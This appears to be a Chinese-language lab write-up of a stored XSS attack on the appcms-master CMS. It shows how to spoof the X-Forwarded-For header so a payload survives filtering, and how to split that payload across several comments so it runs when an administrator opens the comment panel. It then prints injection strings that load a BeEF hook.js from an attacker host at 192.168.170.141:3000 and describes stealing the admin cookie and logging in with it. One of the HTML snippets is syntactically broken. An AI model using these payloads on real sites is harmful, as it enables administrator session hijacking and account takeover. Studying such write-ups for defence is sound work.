网络安全-appcms-master

一、环境

gethub上面自己找appcms-master

二、分析一下源码以及闯关思路

首先是有一个函数循环以及函数过滤，我们的post会将我们所传的所有val值去进行一个循环，之后通过htmlspecialchars这个函数进行过滤和转换所以val值不能通过单双引号闭合注入的方式去做

 我们可以看到在getip中有三种传递方式

其中的HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR我们都可以去进行伪装，我们现在伪装HTTP_X_FORWARDED_FOR这个参数 

我们通过打印看一下它是如何去传的ip（因为断点无法传递这里的问题我现在也没找到程序太老了？？？）

 我们把打印换到引用代码的地方，可以见得是正常的打印了出来，且走到我们的打印函数里面了

那现在我们就要思考了。既然 HTTP_X_FORWARDED_FOR可以进行伪造的话，那怎么去处理隐伪呢？接下来我们抓包去看

可以看到我们的数据成功插入了

那两个都入了且拼接了 ，之后我们再次执行，补充另外半个<script>/*

之后管理员点击后台评论就可以实现自动弹窗了

我们通过三次拼接就可以达到插入最后弹窗如上

<script>/**/alert(1)/**/</script> 

而重要的是alert并没有偷走我们管理员的cookie，现在我们需要思考的是如何偷管理员cookie？？？？（我们可以使用img的方法）

在这里我们使用kill里面的beff软件，正常下载，看了一篇文章讲解的挺细致的

【beef工具-01】神器beef的安装与简介-CSDN博客

我上面花出的这三个网站的意思很重要！！！

Web界面管理控制台：http://127.0.0.1:3000/ui/panel（用于查看上钩的鱼儿以及对不同的目标进行管理操作）
shellcode探针：http://127.0.0.1:3000/hook.js，只要有人运行该文件，就会在管理控制台上线（上钩）。
测试网址：http://127.0.0.1:3000/demos/butcher/index.html，只要有人访问该网站，也会在管理控制台上线（上钩）。

接下来我们要用的就是hook.js这个文件

我们首先创建一个demo2.html这个文件来进行测试

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body></body>
<script>var imgElement = document.createElement('img');imgElement.style.display = 'none';imgElement.src = "http://192.168.170.141:3000/hook.js"document.body.appendChild(`imgElement`)
</script>
</html>

 我们可以很清楚的看到是正常访问到了

那我们现在就要考虑在刚才的情况下我们如何盗取cookie，将我们刚才的HTML代码跟我们上面一样去评论区传入，数据库最终如下

 再传一个闭合最终

我们去管理界面下看是否访问到hook.js

 经过我多次尝试，刚才那种情况我们beef接收不到，img好像传递不了？？？？但是确实是正常访问的

更改一下，可以重新抓包也可以数据库直接更新

"*/var scriptElemet = document.createElement('script');scriptElemet.src = 'http://192.168.170.141:3000/hook.js';document.body.appendChild(scriptElemet);/*"

很明显我们偷到cookie了

 去登录页面删掉cookie

利用cookie直接登录